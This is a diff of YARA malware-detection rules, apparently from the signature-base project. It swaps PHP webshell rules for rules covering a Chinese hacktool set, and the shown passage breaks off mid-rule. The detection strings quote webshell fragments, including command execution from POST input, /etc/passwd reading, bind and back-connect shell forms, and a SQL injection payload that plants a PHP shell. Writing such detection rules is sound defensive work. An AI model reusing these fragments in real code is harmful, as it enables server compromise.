+		hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0"
+		logic_hash = "8246128fa4378b0479a0c051965188c7c3fa0f52c8acc8934ef8af3155a85590"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
-		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
-		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
-		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
-		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
-		$s19 = "$Comments=$_POST['Comments'];" fullword
-		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
+		$s1 = "dic\\loginlist.txt" fullword ascii
+		$s2 = "Radmin.exe" fullword ascii
+		$s3 = "lamescan3.pdf!" fullword ascii
+		$s4 = "dic\\passlist.txt" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3740KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi_2 : FILE
+rule SIGNATURE_BASE_CN_Tools_Pc : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
-		author = "Florian Roth"
-		id = "252ecc2c-83e3-5ca5-a86a-caf76e63e79c"
-		date = "2014-04-06"
-		modified = "2025-03-21"
-		old_rule_name = "WebShell_h4ntu_shell__powered_by_tsoi_"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5759-L5774"
+		description = "Chinese Hacktool Set - file pc.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "11cc6c46-33c0-5c53-88f8-700be9ca8add"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1179-L1195"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
-		logic_hash = "c731f2f430e61277ec6c8e292aa50a31eea46fe67eb455811b3fbe9e8967a8c1"
+		hash = "5cf8caba170ec461c44394f4058669d225a94285"
+		logic_hash = "1da263362e4c2ec8194bb80bfc3f25ff8c4b708919ba02ea02687d5404b99720"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
-		$s2 = "$uname = posix_uname( );" fullword
-		$s3 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
-		$s4 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
+		$s0 = "\\svchost.exe" ascii
+		$s2 = "%s%08x.001" fullword ascii
+		$s3 = "Qy001Service" fullword ascii
+		$s4 = "/.MIKY" fullword ascii
 
 	condition:
-		filesize < 2MB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Myshell
+rule SIGNATURE_BASE_Dos_Down64 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file MyShell.php"
+		description = "Chinese Hacktool Set - file Down64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5776-L5794"
+		id = "b4907ede-dc6a-5b8c-bf1c-557df54191a4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1197-L1215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
-		logic_hash = "2c39ffecb44ce2f936ba3563c6086d8b2ed75aec3b57b45e2a1f5e7321ac9a3f"
+		hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226"
+		logic_hash = "d181c2075762fc3bb5b61bcdef57eb6533cb59dde03c4b901b6ce5b8323f3c8a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<title>MyShell error - Access Denied</title>" fullword
-		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
-		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword
-		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
-		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
-		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
-		$s19 = "#every command you excecute." fullword
-		$s20 = "<form name=\"shell\" method=\"post\">" fullword
+		$s1 = "C:\\Windows\\Temp\\Down.txt" fullword wide
+		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
+		$s3 = "C:\\Windows\\Temp\\" wide
+		$s4 = "ProcessXElement" fullword ascii
+		$s8 = "down.exe" fullword wide
+		$s20 = "set_Timer1" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Pws
+rule SIGNATURE_BASE_Epathobj_Exp32 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file pws.php"
+		description = "Chinese Hacktool Set - file epathobj_exp32.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5795-L5811"
+		id = "ca4639af-ee4f-5220-9595-e7a06b9a8534"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1217-L1235"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
-		logic_hash = "4b2eeb80200cc5dffa80cddc74f1902c0e8a5d2313d9a20d02eeb99ccb668ec0"
+		hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba"
+		logic_hash = "8959837257848a08240d0423971b9d3a850a7e9cc796de2c9b2d34814923f8ec"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "if ($_POST['cmd']){" fullword
-		$s7 = "$cmd = $_POST['cmd'];" fullword
-		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
-		$s11 = "if (file_exists($uploaded)) {" fullword
-		$s12 = "copy($uploaded, $dez);" fullword
-		$s17 = "passthru($cmd);" fullword
+		$s0 = "Watchdog thread %d waiting on Mutex" fullword ascii
+		$s1 = "Exploit ok run command" fullword ascii
+		$s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" ascii
+		$s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii
+		$s4 = "Mutex object did not timeout, list not patched" fullword ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 270KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Reader_Asp_Php
+rule SIGNATURE_BASE_Tools_Unknown : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file reader.asp.php.txt"
+		description = "Chinese Hacktool Set - file unknown.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80ec18e1-6f41-5188-b2d5-f4228c975fa1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5812-L5826"
+		id = "2cb75a84-506d-5b67-8b1f-b91beb5a99a3"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1237-L1254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
-		logic_hash = "6ffda38584b6cdec818af8e09c62bb4a46f40230ffd5c1a68993a91c37f67680"
+		hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f"
+		logic_hash = "493bb63d4dd519efbf53a29fa44ef74f0a85943b2d9f49f11e3daa57c6b03d8e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
-		$s12 = " HACKING " fullword
-		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
-		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
+		$s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+		$s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide
+		$s5 = "Host: 127.0.0.1" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
 }
-rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_3
+rule SIGNATURE_BASE_PLUGIN_Ajunk : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
+		description = "Chinese Hacktool Set - file AJunk.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "349cf6ac-92b3-59f7-a6e4-c23e69b454c6"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5827-L5844"
+		id = "af92d01d-5e24-52f7-934a-0ad102fc7a93"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1256-L1271"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
-		logic_hash = "6840af0d9f99277277edce93deb54e9a319c8938169701c89fdeb65207590951"
+		hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00"
+		logic_hash = "e37504aab506138493ddc0979697502819824ef00c7931599130fafb5d84a7a9"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
-		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
-		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
-		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
-		$s15 = "if(empty($_GET['file'])){" fullword
-		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
+		$s1 = "AJunk.dll" fullword ascii
+		$s2 = "AJunk.DLL" fullword wide
+		$s3 = "AJunk Dynamic Link Library" fullword wide
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 560KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_2
+rule SIGNATURE_BASE_Iisputscanner : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		description = "Chinese Hacktool Set - file IISPutScanner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b647f529-be81-51ad-b671-84aec410e133"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5845-L5861"
+		id = "699ee45d-c842-56eb-b55b-12a91e815a7b"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1273-L1316"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
-		logic_hash = "92bfac3516a448bbb3e78cf8950c6e816bf35d0ae2f3d32bc9b9b2836309999b"
+		hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592"
+		logic_hash = "b2af9003cef528610280866bf00a9716b4421a5f7c65e7c8ec3202af9a592de1"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
-		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword
-		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
-		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
-		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+		$s2 = "KERNEL32.DLL" fullword ascii
+		$s3 = "ADVAPI32.DLL" fullword ascii
+		$s4 = "VERSION.DLL" fullword ascii
+		$s5 = "WSOCK32.DLL" fullword ascii
+		$s6 = "COMCTL32.DLL" fullword ascii
+		$s7 = "GDI32.DLL" fullword ascii
+		$s8 = "SHELL32.DLL" fullword ascii
+		$s9 = "USER32.DLL" fullword ascii
+		$s10 = "OLEAUT32.DLL" fullword ascii
+		$s11 = "LoadLibraryA" fullword ascii
+		$s12 = "GetProcAddress" fullword ascii
+		$s13 = "VirtualProtect" fullword ascii
+		$s14 = "VirtualAlloc" fullword ascii
+		$s15 = "VirtualFree" fullword ascii
+		$s16 = "ExitProcess" fullword ascii
+		$s17 = "RegCloseKey" fullword ascii
+		$s18 = "GetFileVersionInfoA" fullword ascii
+		$s19 = "ImageList_Add" fullword ascii
+		$s20 = "BitBlt" fullword ascii
+		$s21 = "ShellExecuteA" fullword ascii
+		$s22 = "ActivateKeyboardLayout" fullword ascii
+		$s23 = "BBABORT" fullword wide
+		$s25 = "BBCANCEL" fullword wide
+		$s26 = "BBCLOSE" fullword wide
+		$s27 = "BBHELP" fullword wide
+		$s28 = "BBIGNORE" fullword wide
+		$s29 = "PREVIEWGLYPH" fullword wide
+		$s30 = "DLGTEMPLATE" fullword wide
+		$s31 = "TABOUTBOX" fullword wide
+		$s32 = "TFORM1" fullword wide
+		$s33 = "MAINICON" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Backdoor_2
+rule SIGNATURE_BASE_Idtools_For_Winxp_Idttool_2 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file php-backdoor.php"
+		description = "Chinese Hacktool Set - file IdtTool.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65e1305b-4fc7-5885-b3df-92846bb57fe3"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_php_backdoor"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5862-L5878"
+		id = "0312be49-c262-5143-abfc-02d428552b86"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1318-L1335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
-		logic_hash = "4228bcbfff5d7756615347196270f7916843e2aceacc7298610070b8b923381b"
+		hash = "07feb31dd21d6f97614118b8a0adf231f8541a67"
+		logic_hash = "831f42abd7374b2ca2b4115a73aae2123e2212b0854d4cc0950b8e66a28e38a3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
-		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
-		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
-		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
-		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+		$s0 = "\\Device\\devIdtTool" wide
+		$s1 = "IoDeleteSymbolicLink" fullword ascii
+		$s3 = "IoDeleteDevice" fullword ascii
+		$s6 = "IoCreateSymbolicLink" fullword ascii
+		$s7 = "IoCreateDevice" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 7KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Worse_Linux_Shell_2
+rule SIGNATURE_BASE_Hkmjjiis6 : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
+		description = "Chinese Hacktool Set - file hkmjjiis6.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "04ed7464-29d1-54b9-98ff-afc03475b220"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "WebShell_Worse_Linux_Shell"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5879-L5896"
+		id = "9618c6ec-1557-5b1b-bebc-1c220bb3aba4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1337-L1358"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
-		logic_hash = "6480c524213583511253ea1d37820994bba8a86f58a3775d4a9e4325725289d8"
+		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
+		logic_hash = "4ea95b7a5bd24e0dfdcef045d101b7f15e18b20f1328901bb340d9aaad336981"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
-		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
-		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
-		$s8 = "$currentCMD = \"ls -la\";" fullword
-		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
-		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
+		$s1 = "comspec" fullword ascii
+		$s2 = "user32.dlly" ascii
+		$s3 = "runtime error" ascii
+		$s4 = "WinSta0\\Defau" ascii
+		$s5 = "AppIDFlags" fullword ascii
+		$s6 = "GetLag" fullword ascii
+		$s7 = "* FROM IIsWebInfo" ascii
+		$s8 = "wmiprvse.exe" ascii
+		$s9 = "LookupAcc" ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Phpinj
+rule SIGNATURE_BASE_Dos_Lcx : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file pHpINJ.php"
+		description = "Chinese Hacktool Set - file lcx.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5897-L5914"
+		id = "2f443673-bfed-5ce3-a0e6-6b59f27c9658"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1360-L1384"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
-		logic_hash = "271efaa8f370376f971d3d59256658b341599ac554cc216e09401e44b16bdede"
+		hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d"
+		logic_hash = "bbe215fb27825b4f4bbfa71808ac945f341efbc70a21f79689065982a843d7f1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
-		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
-		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
-		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
-		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
-		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
-		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
+		$s0 = "c:\\Users\\careful_snow\\" ascii
+		$s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii
+		$s7 = "[-] There is a error...Create a new connection." fullword ascii
+		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
+		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s13 = "[+] Make a Connection to %s:%d...." fullword ascii
+		$s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+		$s17 = "[+] Waiting another Client on port:%d...." fullword ascii
+		$s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_NGH
+rule SIGNATURE_BASE_X_Way2_5_X_Way : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file NGH.php"
+		description = "Chinese Hacktool Set - file X-way.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5915-L5932"
+		id = "8e878671-2a7c-5c6e-a905-05d303f42e0f"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1386-L1407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
-		logic_hash = "572b026545b012951136bdb9b1101e38f27bc3321b895799bc853ea1190877f9"
+		hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6"
+		logic_hash = "6261de5db1e7527f7726effe26ed5f88638e6cb378db4c99183dddcd42ae231f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
-		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
-		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
-		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
-		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
-		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
-		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
+		$s0 = "TTFTPSERVERFRM" fullword wide
+		$s1 = "TPORTSCANSETFRM" fullword wide
+		$s2 = "TIISSHELLFRM" fullword wide
+		$s3 = "TADVSCANSETFRM" fullword wide
+		$s4 = "ntwdblib.dll" fullword ascii
+		$s5 = "TSNIFFERFRM" fullword wide
+		$s6 = "TCRACKSETFRM" fullword wide
+		$s7 = "TCRACKFRM" fullword wide
+		$s8 = "dbnextrow" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Matamu
+rule SIGNATURE_BASE_Tools_Sqlcmd : FILE
 {
 	meta:
-		description = "PHP Webshells Github Archive - file matamu.php"
+		description = "Chinese Hacktool Set - file Sqlcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5933-L5949"
+		id = "26e29826-d4bb-55d0-9331-a91e4473daca"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1409-L1428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
-		logic_hash = "c0101dab5fe7c3a2652b2e23e1ef0274364137895a402a0367c6b5474c0e8a1f"
+		hash = "99d56476e539750c599f76391d717c51c4955a33"
+		logic_hash = "aa600f7c56d72d767e9ca51d8b1ee2b2c62302ea1afbed39e4670debd30c5247"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "$command .= ' -F';" fullword
-		$s3 = "/* We try and match a cd command. */" fullword
-		$s4 = "directory... Trust me - it works :-) */" fullword
-		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
-		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
-		$s16 = "/* The last / in work_dir were the first charecter." fullword
